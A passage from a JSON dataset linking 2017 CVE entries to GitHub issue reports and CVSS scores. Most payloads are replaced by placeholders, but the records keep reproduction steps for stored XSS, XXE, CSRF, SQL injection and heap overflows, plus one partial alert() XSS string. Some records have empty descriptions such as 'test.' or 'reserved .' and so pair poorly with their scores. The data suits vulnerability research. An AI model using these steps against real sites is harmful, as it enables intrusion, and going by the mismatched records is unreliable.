  5260. "description": "Heap buffer overflow in parseelt (minixml.c) and SIGSEGV in APITAG (upnpreplyparse.c). Dear miniupnpd team \u2014 I have detected a heap buffer overflow in parseelt (minixml.c) and a memory corruption (invalid read, SIGSEGV) in APITAG (upnpreplyparse.c). while handling two consecutive malformed SOAP Request. Version APITAG How to reproduce the NUMBERTAG issues NUMBERTAG Compile miniupnpd with clang and add the following flags for detecting the memory corruption (optional valgrind can also detect the overflow) APITAG NUMBERTAG Start miniupnpd APITAG NUMBERTAG Use _netcat_ to trigger the heap buffer overflow CODETAG NUMBERTAG Use _netcat_ to trigger the consecutive SIGSEGV CODETAG ASAN output (heap buffer overflow) ERRORTAG ASAN output (SIGSEGV) ERRORTAG Valgrind output (heap buffer overflow + SIGSEGV if compiled without the flags from NUMBERTAG ERRORTAG I found the two issues with AFL. Best Stephan Zeisberg",
  5261. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  5262. "severity": "HIGH",
  5263. "baseScore": 7.8,
  5264. "impactScore": 5.9,
  5265. "exploitabilityScore": 1.8
  5266. },
  5267. {
  5268. "CVE_ID": "CVE-2017-1000495",
  5269. "Issue_Url_old": "https://github.com/quickapps/cms/issues/183",
  5270. "Issue_Url_new": "https://github.com/quickapps/cms/issues/183",
  5271. "Repo_new": "quickapps/cms",
  5272. "Issue_Created_At": "2017-12-11T10:28:01Z",
  5273. "description": "Stored Cross Site Scripting (XSS). Issue Any user can execute APITAG code on an administrator user's account by simply changing their name into an XSS payload. This can be used to create a denial of service condition, or make the administrator perform unauthorised actions. Steps to reproduce NUMBERTAG Create a user with the lowest privileges NUMBERTAG Navigate to the 'My Account' section of the application NUMBERTAG Change the user's real name to a APITAG payload, like ERRORTAG NUMBERTAG Log out of the account NUMBERTAG Log into an administrator account NUMBERTAG Navigate to the user list in the administrator's console NUMBERTAG Observe an alert box appear",
  5274. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5275. "severity": "MEDIUM",
  5276. "baseScore": 5.4,
  5277. "impactScore": 2.7,
  5278. "exploitabilityScore": 2.3
  5279. },
  5280. {
  5281. "CVE_ID": "CVE-2017-1000496",
  5282. "Issue_Url_old": "https://github.com/commsy/commsy/issues/2",
  5283. "Issue_Url_new": "https://github.com/commsy/commsy/issues/2",
  5284. "Repo_new": "commsy/commsy",
  5285. "Issue_Created_At": "2017-12-13T03:41:04Z",
  5286. "description": "XXE APITAG in configuration import. Issue An appropriately placed attacker can upload a ZIP file with XML files within it. If these XML files contain the payload from billion laughs attack ( URLTAG a denial of service scenario can be created. Remediation Before loading the XML into memory, use APITAG to ensure no entities can affect your import",
  5287. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5288. "severity": "HIGH",
  5289. "baseScore": 8.8,
  5290. "impactScore": 5.9,
  5291. "exploitabilityScore": 2.8
  5292. },
  5293. {
  5294. "CVE_ID": "CVE-2017-1000497",
  5295. "Issue_Url_old": "https://github.com/sbrl/Pepperminty-Wiki/issues/152",
  5296. "Issue_Url_new": "https://github.com/sbrl/pepperminty-wiki/issues/152",
  5297. "Repo_new": "sbrl/pepperminty-wiki",
  5298. "Issue_Created_At": "2017-12-13T03:56:34Z",
  5299. "description": "XXE APITAG in getsvgsize. Issue Pepperminty Wiki is vulnerable to XXE attacks due to the usage of the APITAG function without disabling entities. This leads to a confirmed denial of service scenario ( URLTAG and may lead to execution of commands on the server. Where the Issue Occurred If an uploaded svg, containing the billion laughs payload, makes its way to the simplexml_load_file function, the denial of service scenario is triggered. This exact locations in the code are given below: URLTAG URLTAG Remediation Prior to loading any xml, disable entities ensuring that the above mentioned attacks will no longer be possible. APITAG",
  5300. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  5301. "severity": "CRITICAL",
  5302. "baseScore": 9.8,
  5303. "impactScore": 5.9,
  5304. "exploitabilityScore": 3.9
  5305. },
  5306. {
  5307. "CVE_ID": "CVE-2017-1000498",
  5308. "Issue_Url_old": "https://github.com/BigBadaboom/androidsvg/issues/122",
  5309. "Issue_Url_new": "https://github.com/bigbadaboom/androidsvg/issues/122",
  5310. "Repo_new": "bigbadaboom/androidsvg",
  5311. "Issue_Created_At": "2017-12-13T05:33:19Z",
  5312. "description": "XXE APITAG within SVG Parsing. Issue androidsvg is vulnerable to XXE attacks as some dangerous features are not disabled. This leads to a confirmed denial of service scenario ( URLTAG and may lead to execution of commands on the server. This issue occurs in the SVG parse section of the code: URLTAG Prior to parsing the XML, features like entities are not disabled. These should not be required at all within an SVG file. Remediation Implementing something down the lines of the following: CODETAG This ensures that the entities are no longer parsed and external dtd files are not either.",
  5313. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5314. "severity": "HIGH",
  5315. "baseScore": 7.8,
  5316. "impactScore": 5.9,
  5317. "exploitabilityScore": 1.8
  5318. },
  5319. {
  5320. "CVE_ID": "CVE-2017-1000506",
  5321. "Issue_Url_old": "https://github.com/mautic/mautic/issues/5222",
  5322. "Issue_Url_new": "https://github.com/mautic/mautic/issues/5222",
  5323. "Repo_new": "mautic/mautic",
  5324. "Issue_Created_At": "2017-10-27T00:49:18Z",
  5325. "description": "Stored XSS in Company Name. What type of report is this: | Q | A | | | Bug report? | \u2713 | Feature request? | | Enhancement? | Description: Stored Cross site scripting in the Company's name. This allows a person to gain arbitrary execution of JS code on anyone who views the Company's name within their browser. If a bug: | Q | A | | | Mautic version NUMBERTAG PHP version NUMBERTAG Steps to reproduce NUMBERTAG Create a new company NUMBERTAG Set the company name to ERRORTAG NUMBERTAG Navigate to a place where the company name is reflected and observe an alert box pop up Log errors: APITAG check for related errors in the latest log file in [mautic PATHTAG and/or the web server's logs and post them here. Be sure to remove sensitive information if applicable._ None",
  5326. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  5327. "severity": "MEDIUM",
  5328. "baseScore": 6.1,
  5329. "impactScore": 2.7,
  5330. "exploitabilityScore": 2.8
  5331. },
  5332. {
  5333. "CVE_ID": "CVE-2017-1000507",
  5334. "Issue_Url_old": "https://github.com/cnvs/canvas/issues/359",
  5335. "Issue_Url_new": "https://github.com/austintoddj/canvas/issues/359",
  5336. "Repo_new": "austintoddj/canvas",
  5337. "Issue_Created_At": "2017-10-27T02:52:28Z",
  5338. "description": "Stored XSS Vulnerability. Description An attacker can arbitrarily execute JS code in another user's browser. Steps to reproduce NUMBERTAG Log in with a valid user NUMBERTAG Change the user's display name to ERRORTAG NUMBERTAG Log out of the account NUMBERTAG Log into an admin user NUMBERTAG Navigate to the user page (listing all users). Notice an alert box pops up showing execution of JS Remediation When printing this variable out, simply HTML encode it.",
  5339. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5340. "severity": "MEDIUM",
  5341. "baseScore": 5.4,
  5342. "impactScore": 2.7,
  5343. "exploitabilityScore": 2.3
  5344. },
  5345. {
  5346. "CVE_ID": "CVE-2017-1000509",
  5347. "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/7727",
  5348. "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/7727",
  5349. "Repo_new": "dolibarr/dolibarr",
  5350. "Issue_Created_At": "2017-10-27T22:01:56Z",
  5351. "description": "Stored Cross site scripting (XSS) in product page. Bug Stored Cross site scripting (XSS) using product page, bypassing XSS detection Environment Version NUMBERTAG OS : Ubuntu Web server : Apache PHP NUMBERTAG Database : APITAG URL(s) : APITAG Expected and actual behavior Expected behaviour XSS detector picks up on the payload and refuses to save it Actual behaviour XSS payload is saved with no interference from the detector. When visiting the page later, the payload executes. Steps to reproduce the behavior NUMBERTAG Log into Dolibarr with a user who can edit the name of a product NUMBERTAG Choose a product (this products name will be changed FYI), and click on the modify details button NUMBERTAG Append the following payload to the product's current name: APITAG Suggested implementation Change the detector to now pick up on similar payloads (including this one)",
  5352. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5353. "severity": "MEDIUM",
  5354. "baseScore": 5.4,
  5355. "impactScore": 2.7,
  5356. "exploitabilityScore": 2.3
  5357. },
  5358. {
  5359. "CVE_ID": "CVE-2017-1000510",
  5360. "Issue_Url_old": "https://github.com/croogo/croogo/issues/847",
  5361. "Issue_Url_new": "https://github.com/croogo/croogo/issues/847",
  5362. "Repo_new": "croogo/croogo",
  5363. "Issue_Created_At": "2017-10-28T08:15:05Z",
  5364. "description": "Stored Cross site Scripting (XSS). Summary Stored Cross site Scripting (XSS) in page name allowing a user to get arbitrary JS execution. This isn't really a big issue as the website already has all session tokens using APITAG and you need to be an administrator (if using as the default) to post. It is quite reasonable for organisations to make other roles for contributors/authors, hence being worth the patch. I'm not too sure if this is still an issue in NUMBERTAG as I couldn't get the server set up for it yet. System information Croogo version NUMBERTAG g6f NUMBERTAG e6c Web server: apache2 APITAG Ubuntu NUMBERTAG Steps to reproduce NUMBERTAG Log into the website NUMBERTAG Create a new page NUMBERTAG Set the page's name to ERRORTAG NUMBERTAG isit the page list section of the admin panel and observe an alert box pop up. Expected behavior ERRORTAG is HTML Encoded Actual behavior JS code is arbitrarily executed",
  5365. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5366. "severity": "MEDIUM",
  5367. "baseScore": 5.4,
  5368. "impactScore": 2.7,
  5369. "exploitabilityScore": 2.3
  5370. },
  5371. {
  5372. "CVE_ID": "CVE-2017-1001001",
  5373. "Issue_Url_old": "https://github.com/pluxml/PluXml/issues/253",
  5374. "Issue_Url_new": "https://github.com/pluxml/pluxml/issues/253",
  5375. "Repo_new": "pluxml/pluxml",
  5376. "Issue_Created_At": "2017-09-22T05:54:56Z",
  5377. "description": "Stored XSS within article creation. A writer or the administrator can write javascript within the page, which can then be used to steal other user's session tokens (actually quite possible as the session token doesn't have APITAG enabled). Adding something like APITAG , in the article's content stores the payload on the server. Then any user who visits the page is affected by the payload. I would advise HTML encoding the user input and also setting the APITAG flag on the session token.",
  5378. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5379. "severity": "MEDIUM",
  5380. "baseScore": 5.4,
  5381. "impactScore": 2.7,
  5382. "exploitabilityScore": 2.3
  5383. },
  5384. {
  5385. "CVE_ID": "CVE-2017-1002100",
  5386. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/47611",
  5387. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/47611",
  5388. "Repo_new": "kubernetes/kubernetes",
  5389. "Issue_Created_At": "2017-06-15T18:59:13Z",
  5390. "description": "Azure PV should be Private scope not Container scope.",
  5391. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  5392. "severity": "MEDIUM",
  5393. "baseScore": 6.5,
  5394. "impactScore": 3.6,
  5395. "exploitabilityScore": 2.8
  5396. },
  5397. {
  5398. "CVE_ID": "CVE-2017-1002101",
  5399. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/60813",
  5400. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/60813",
  5401. "Repo_new": "kubernetes/kubernetes",
  5402. "Issue_Created_At": "2018-03-05T20:53:58Z",
  5403. "description": "APITAG . <content tbd>",
  5404. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
  5405. "severity": "CRITICAL",
  5406. "baseScore": 9.6,
  5407. "impactScore": 5.8,
  5408. "exploitabilityScore": 3.1
  5409. },
  5410. {
  5411. "CVE_ID": "CVE-2017-1002102",
  5412. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/60814",
  5413. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/60814",
  5414. "Repo_new": "kubernetes/kubernetes",
  5415. "Issue_Created_At": "2018-03-05T20:55:20Z",
  5416. "description": "APITAG . <content tbd>",
  5417. "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:N",
  5418. "severity": "MEDIUM",
  5419. "baseScore": 5.6,
  5420. "impactScore": 4.0,
  5421. "exploitabilityScore": 1.1
  5422. },
  5423. {
  5424. "CVE_ID": "CVE-2017-1002152",
  5425. "Issue_Url_old": "https://github.com/fedora-infra/bodhi/issues/1740",
  5426. "Issue_Url_new": "https://github.com/fedora-infra/bodhi/issues/1740",
  5427. "Repo_new": "fedora-infra/bodhi",
  5428. "Issue_Created_At": "2017-08-10T15:53:09Z",
  5429. "description": "CVETAG : APITAG injection via Bugzilla ticket subjects. Marcel reported CVETAG that it is possible to inject APITAG into Bodhi's web interface through Bugzilla ticket subjects. The reporter cited an update URLTAG that did not properly escape tags from the bug it was associated with. We should run the bugzilla text through bleach, similar to what we do for comments from our users.",
  5430. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  5431. "severity": "MEDIUM",
  5432. "baseScore": 6.1,
  5433. "impactScore": 2.7,
  5434. "exploitabilityScore": 2.8
  5435. },
  5436. {
  5437. "CVE_ID": "CVE-2017-10667",
  5438. "Issue_Url_old": "https://github.com/zhonghaozhao/zencart/issues/1",
  5439. "Issue_Url_new": "https://github.com/zhonghaozhao/zencart/issues/1",
  5440. "Repo_new": "zhonghaozhao/zencart",
  5441. "Issue_Created_At": "2017-06-24T04:30:35Z",
  5442. "description": "zencart. XSS URLTAG FILETAG URLTAG FILETAG",
  5443. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  5444. "severity": "MEDIUM",
  5445. "baseScore": 6.1,
  5446. "impactScore": 2.7,
  5447. "exploitabilityScore": 2.8
  5448. },
  5449. {
  5450. "CVE_ID": "CVE-2017-10667",
  5451. "Issue_Url_old": "https://github.com/zencart/zencart/issues/1443",
  5452. "Issue_Url_new": "https://github.com/zencart/zencart/issues/1443",
  5453. "Repo_new": "zencart/zencart",
  5454. "Issue_Created_At": "2017-06-24T03:36:00Z",
  5455. "description": "XSS. URLTAG FILETAG URLTAG FILETAG affect NUMBERTAG",
  5456. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  5457. "severity": "MEDIUM",
  5458. "baseScore": 6.1,
  5459. "impactScore": 2.7,
  5460. "exploitabilityScore": 2.8
  5461. },
  5462. {
  5463. "CVE_ID": "CVE-2017-10673",
  5464. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1234",
  5465. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1234",
  5466. "Repo_new": "getsimplecms/getsimplecms",
  5467. "Issue_Created_At": "2017-06-28T02:37:37Z",
  5468. "description": "admin/profile.php At xss. Display Name: where there is xss payload: \"> APITAG alert(/xss/) APITAG",
  5469. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  5470. "severity": "MEDIUM",
  5471. "baseScore": 6.1,
  5472. "impactScore": 2.7,
  5473. "exploitabilityScore": 2.8
  5474. },
  5475. {
  5476. "CVE_ID": "CVE-2017-10678",
  5477. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/721",
  5478. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/721",
  5479. "Repo_new": "piwigo/piwigo",
  5480. "Issue_Created_At": "2017-06-28T20:07:56Z",
  5481. "description": "Bug Report: Set administrator private album to public via CSRF & Incorrect Permissions. Proof of Concept APITAG Incorrect Permissions in album ID The public / private tags private means that the administrator doesn\u2019t want others to know about the album. But there is some way to know which album he is hiding. And what the private album\u2019s permalinks is NUMBERTAG By creating album , you could know that album id is in rule NUMBERTAG So you can brute force the album id CODETAG FILETAG FILETAG FILETAG Now is time to republic it. Cross Site Request Forgery in page permalinks & status, visible, comments in page cat_options. There is no pwg_token in the request. So NUMBERTAG set private albums to public CODETAG NUMBERTAG Permalink delete CODETAG NUMBERTAG unlock albums CODETAG Original packet CODETAG References: URLTAG Discovered By: topsec(Li Zhiqiang)",
  5482. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5483. "severity": "HIGH",
  5484. "baseScore": 8.8,
  5485. "impactScore": 5.9,
  5486. "exploitabilityScore": 2.8
  5487. },
  5488. {
  5489. "CVE_ID": "CVE-2017-10679",
  5490. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/723",
  5491. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/723",
  5492. "Repo_new": "piwigo/piwigo",
  5493. "Issue_Created_At": "2017-06-28T21:54:00Z",
  5494. "description": "when requesting a private id, the permalink is revealed. see URLTAG",
  5495. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  5496. "severity": "HIGH",
  5497. "baseScore": 7.5,
  5498. "impactScore": 3.6,
  5499. "exploitabilityScore": 3.9
  5500. },
  5501. {
  5502. "CVE_ID": "CVE-2017-10682",
  5503. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/724",
  5504. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/724",
  5505. "Repo_new": "piwigo/piwigo",
  5506. "Issue_Created_At": "2017-06-29T05:19:56Z",
  5507. "description": "Bug Report: SQL injection in page cat_options. Proof of Concept APITAG section status CODETAG FILETAG FILETAG section comments CODETAG FILETAG",
  5508. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  5509. "severity": "CRITICAL",
  5510. "baseScore": 9.8,
  5511. "impactScore": 5.9,
  5512. "exploitabilityScore": 3.9
  5513. },
  5514. {
  5515. "CVE_ID": "CVE-2017-10788",
  5516. "Issue_Url_old": "https://github.com/perl5-dbi/DBD-mysql/issues/120",
  5517. "Issue_Url_new": "https://github.com/perl5-dbi/dbd-mysql/issues/120",
  5518. "Repo_new": "perl5-dbi/dbd-mysql",
  5519. "Issue_Created_At": "2017-04-13T16:44:13Z",
  5520. "description": "DBD::mysql::st DESTROY failed on APITAG Some tests from DBD::mysql fail on APITAG with different perl versions NUMBERTAG and NUMBERTAG Here there are two different reports: URLTAG URLTAG Both failed with the same errors: CODETAG And this \"beta\" character goes on in very long lines. It is important to note that APITAG is not indeed available on APITAG by default, but APITAG is installed instead: CODETAG I also have reports from this same CPAN Smoker with PASS and UNKNOWN results, but in both cases the tests were skipped.",
  5521. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  5522. "severity": "CRITICAL",
  5523. "baseScore": 9.8,
  5524. "impactScore": 5.9,
  5525. "exploitabilityScore": 3.9
  5526. },
  5527. {
  5528. "CVE_ID": "CVE-2017-10789",
  5529. "Issue_Url_old": "https://github.com/perl5-dbi/DBD-mysql/issues/110",
  5530. "Issue_Url_new": "https://github.com/perl5-dbi/dbd-mysql/issues/110",
  5531. "Repo_new": "perl5-dbi/dbd-mysql",
  5532. "Issue_Created_At": "2017-03-23T11:54:02Z",
  5533. "description": "Handle SSL/TLS correctly. Currently DBD::mysql has these SSL/TLS connections parameters: APITAG After discussion in URLTAG and URLTAG I'm proposing following change how DBD::mysql should process SSL/TLS settings NUMBERTAG Parameter APITAG would change its meaning and after this change SSL/TLS will be required and enforced. If server does not support it then client must not connect to APITAG server and must reject connection NUMBERTAG Introduce new APITAG parameter (default false; SSL/TLS is required and enforced) which could allow to connect to APITAG server without SSL/TLS support when APITAG . This is dangerous as BACKRONYM ( URLTAG or Riddle ( URLTAG can take effect, but in some cases it could be useful (e.g. when it can be ensured that it is not possible to modify any packet between client and server, just there can be passive monitoring of network). Documentation for APITAG must describe this problem and suggest users to not enable this option if they are unsure NUMBERTAG When specified APITAG or APITAG then DBD::mysql must check and verify CA certificate. If validation fails then connection must be rejected NUMBERTAG If DBD::mysql (or underlaying libmysqlclient.so library) decide to reject connection with APITAG server then data (login credentials, authentication negotiation or SQL statements) must not be sent to APITAG server NUMBERTAG If underlaying libmysqlclient.so library is not able to enforce current configuration specified by APITAG parameters then it must reject connection NUMBERTAG If it is possible try to support different versions of libmysqlclient.so library APITAG APITAG NUMBERTAG If not, rather drop SSL support for particular libmysqlclient.so version as providing PATHTAG SSL encryption. CC: MENTIONTAG MENTIONTAG MENTIONTAG Please review my changes and if something is missing or incorrect let me know.",
  5534. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  5535. "severity": "MEDIUM",
  5536. "baseScore": 5.9,
  5537. "impactScore": 3.6,
  5538. "exploitabilityScore": 2.2
  5539. },
  5540. {
  5541. "CVE_ID": "CVE-2017-10789",
  5542. "Issue_Url_old": "https://github.com/perl5-dbi/DBD-mysql/issues/140",
  5543. "Issue_Url_new": "https://github.com/perl5-dbi/dbd-mysql/issues/140",
  5544. "Repo_new": "perl5-dbi/dbd-mysql",
  5545. "Issue_Created_At": "2017-07-01T18:14:10Z",
  5546. "description": "CVETAG : mysql_ssl NUMBERTAG does not enforce encryption. DBD::mysql connects to APITAG server without SSL encryption even when APITAG is set together with APITAG certificate. Test case: CODETAG Related to URLTAG",
  5547. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  5548. "severity": "MEDIUM",
  5549. "baseScore": 5.9,
  5550. "impactScore": 3.6,
  5551. "exploitabilityScore": 2.2
  5552. },
  5553. {
  5554. "CVE_ID": "CVE-2017-10795",
  5555. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/467",
  5556. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/467",
  5557. "Repo_new": "intelliants/subrion",
  5558. "Issue_Created_At": "2017-06-07T03:31:38Z",
  5559. "description": "Stored Cross site Scripting in PATHTAG Hi, I found a stored cross site scripting vulnerability in PATHTAG . And i also tested it on new develop version , it is vulnerable too. The POC is shown below. Version : develop version 'commit bc6ed NUMBERTAG URLTAG FILETAG When the other user accesses the blog, the script code will be executed FILETAG E Mail: EMAILTAG Discovered by: Huawei Weiran Labs",
  5560. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  5561. "severity": "MEDIUM",
  5562. "baseScore": 6.1,
  5563. "impactScore": 2.7,
  5564. "exploitabilityScore": 2.8
  5565. },
  5566. {
  5567. "CVE_ID": "CVE-2017-10803",
  5568. "Issue_Url_old": "https://github.com/odoo/odoo/issues/17898",
  5569. "Issue_Url_new": "https://github.com/odoo/odoo/issues/17898",
  5570. "Repo_new": "odoo/odoo",
  5571. "Issue_Created_At": "2017-06-28T21:57:57Z",
  5572. "description": "reserved .",
  5573. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
  5574. "severity": "MEDIUM",
  5575. "baseScore": 6.5,
  5576. "impactScore": 5.9,
  5577. "exploitabilityScore": 0.6
  5578. },
  5579. {
  5580. "CVE_ID": "CVE-2017-10804",
  5581. "Issue_Url_old": "https://github.com/psycopg/psycopg2/issues/420",
  5582. "Issue_Url_new": "https://github.com/psycopg/psycopg2/issues/420",
  5583. "Repo_new": "psycopg/psycopg2",
  5584. "Issue_Created_At": "2016-03-30T19:36:22Z",
  5585. "description": "Strings with NUL bytes are silently truncated in bound parameters. Minimal repro: CODETAG This prints out APITAG , which is neither what I tried to insert nor what I tried to query for, which came as a surprise to me! I would have expected some kind of exception to be thrown. This has the potential to cause security flaws if a developer assumes that the string being queried/inserted has passed validation because the query worked.",
  5586. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  5587. "severity": "CRITICAL",
  5588. "baseScore": 9.8,
  5589. "impactScore": 5.9,
  5590. "exploitabilityScore": 3.9
  5591. },
  5592. {
  5593. "CVE_ID": "CVE-2017-10804",
  5594. "Issue_Url_old": "https://github.com/odoo/odoo/issues/17914",
  5595. "Issue_Url_new": "https://github.com/odoo/odoo/issues/17914",
  5596. "Repo_new": "odoo/odoo",
  5597. "Issue_Created_At": "2017-06-29T11:56:01Z",
  5598. "description": "reserved .",
  5599. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  5600. "severity": "CRITICAL",
  5601. "baseScore": 9.8,
  5602. "impactScore": 5.9,
  5603. "exploitabilityScore": 3.9
  5604. },
  5605. {
  5606. "CVE_ID": "CVE-2017-10805",
  5607. "Issue_Url_old": "https://github.com/odoo/odoo/issues/17921",
  5608. "Issue_Url_new": "https://github.com/odoo/odoo/issues/17921",
  5609. "Repo_new": "odoo/odoo",
  5610. "Issue_Created_At": "2017-06-29T15:21:47Z",
  5611. "description": "reserved .",
  5612. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  5613. "severity": "HIGH",
  5614. "baseScore": 8.8,
  5615. "impactScore": 5.9,
  5616. "exploitabilityScore": 2.8
  5617. },
  5618. {
  5619. "CVE_ID": "CVE-2017-10869",
  5620. "Issue_Url_old": "https://github.com/h2o/h2o/issues/1460",
  5621. "Issue_Url_new": "https://github.com/h2o/h2o/issues/1460",
  5622. "Repo_new": "h2o/h2o",
  5623. "Issue_Created_At": "2017-10-18T06:17:40Z",
  5624. "description": "test.",
  5625. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  5626. "severity": "HIGH",
  5627. "baseScore": 7.5,
  5628. "impactScore": 3.6,
  5629. "exploitabilityScore": 3.9
  5630. },
  5631. {
  5632. "CVE_ID": "CVE-2017-10872",
  5633. "Issue_Url_old": "https://github.com/h2o/h2o/issues/1543",
  5634. "Issue_Url_new": "https://github.com/h2o/h2o/issues/1543",
  5635. "Repo_new": "h2o/h2o",
  5636. "Issue_Created_At": "2017-12-14T07:08:11Z",
  5637. "description": "test.",
  5638. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  5639. "severity": "MEDIUM",
  5640. "baseScore": 6.5,
  5641. "impactScore": 3.6,
  5642. "exploitabilityScore": 2.8
  5643. },
  5644. {
  5645. "CVE_ID": "CVE-2017-10908",
  5646. "Issue_Url_old": "https://github.com/h2o/h2o/issues/1544",
  5647. "Issue_Url_new": "https://github.com/h2o/h2o/issues/1544",
  5648. "Repo_new": "h2o/h2o",
  5649. "Issue_Created_At": "2017-12-14T07:13:53Z",
  5650. "description": "test.",
  5651. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  5652. "severity": "HIGH",
  5653. "baseScore": 7.5,
  5654. "impactScore": 3.6,
  5655. "exploitabilityScore": 3.9
  5656. },
  5657. {
  5658. "CVE_ID": "CVE-2017-10928",
  5659. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/539",
  5660. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/539",
  5661. "Repo_new": "imagemagick/imagemagick",
  5662. "Issue_Created_At": "2017-07-04T16:34:09Z",
  5663. "description": "Heap buffer overflow of identify&convert. APITAG NUMBERTAG APITAG APITAG APITAG build instructions: APITAG when identify or convert MNG file, imagemagick will cause a heap buffer overflow > APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG df0 at pc NUMBERTAG f NUMBERTAG bfe NUMBERTAG a7 bp NUMBERTAG ffdd3a NUMBERTAG b NUMBERTAG sp NUMBERTAG ffdd3a NUMBERTAG b NUMBERTAG READ of size NUMBERTAG at NUMBERTAG df0 thread T NUMBERTAG f NUMBERTAG bfe NUMBERTAG a6 in APITAG APITAG NUMBERTAG f NUMBERTAG c1a NUMBERTAG e in APITAG APITAG NUMBERTAG f NUMBERTAG c1a NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG efdcd0 in APITAG ( PATHTAG NUMBERTAG f NUMBERTAG f0e NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG f0f NUMBERTAG a in APITAG ( PATHTAG NUMBERTAG f NUMBERTAG c1acb NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG bd NUMBERTAG c4f in APITAG APITAG NUMBERTAG f NUMBERTAG bfdde NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG bd NUMBERTAG c in APITAG APITAG NUMBERTAG f NUMBERTAG bd NUMBERTAG a9 in APITAG APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG a2a in APITAG APITAG NUMBERTAG f NUMBERTAG b7a8c7a in APITAG APITAG NUMBERTAG a in APITAG APITAG NUMBERTAG be in main APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c8 in _start ( PATHTAG ) The vulnerability is caused when identify MNG image, which happens in function APITAG APITAG function APITAG is called by APITAG APITAG Here is the critical code of mng_get_long and its call code: ERRORTAG The reason of this heap buffer overflow is when p buffer has no matched \u2018(\u2018 \u2018)\u2019characters, the POC\u2019s buffer p here is \u201c\"trix( APITAG caused the heap buffer overflow read until next NUMBERTAG matched. It is possible to disclosing some critical data, such as heap chunk data and even other applications\u2019 private data. I am not sure whether it can be exploited to achieve code execution, maybe it is possible. Testcase: URLTAG",
  5664. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5665. "severity": "HIGH",
  5666. "baseScore": 8.8,
  5667. "impactScore": 5.9,
  5668. "exploitabilityScore": 2.8
  5669. },
  5670. {
